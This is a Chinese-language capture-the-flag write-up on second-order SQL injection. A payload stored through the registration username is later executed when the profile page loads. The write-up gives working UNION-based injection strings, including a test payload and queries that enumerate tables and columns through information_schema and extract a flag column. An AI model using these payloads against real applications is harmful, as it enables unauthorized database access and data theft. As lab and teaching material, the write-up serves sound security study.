简介
这是一个sql二次注入的题。所谓二次注入就是先在非注入点构造payload,程序会存储这个payload。然后程序会在注入点调用这个payload进行数据库操作。
详解
- 打开首页,是一个登录页面,还有个注册按钮。
- 随便注册一个用户名,然后登录。页面会显示个人简介,且可以修改个人简介。
- 这个个人简介应该是默认的。尝试重新注册新账号登录还是这句话,修改个人简介,重新登录,发现不是默认的,个人简介应该是存储在数据库中的。
- 尝试简单注入,构造payload
' or 1=1#。发现单引号被转义。
- 联想题目二次注入,开始猜测以下所使用的sql语句。
--注册
insert into user values('用户名','密码','十月太懒,没有简介');
--登录
select * from user where 用户名='用户名' and 密码='密码';、
--登录之后会显示个人简介
select 个人简介 from user where 用户名='用户名';- 简单联想后发现,自己输入的用户名和密码都会被再次调用。但是个人简介会回显到页面,所以用户名应该是用来存储payload,然后在个人简介调用payload。
- 只看
select 个人简介 from user where 用户名='用户名';sql语句构造payload即可。 - 简单构造payload
zz' union select 1#,尝试是否成功。
- 页面成功回显
1,而不是默认简介,发现注入成功。继续构造payload寻找flag。
--查询表名
1' union select group_concat(table_name) from information_schema.tables where table_schema=database()#
--查询flag列名
1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#
--查询flag
1' union select flag from flag#
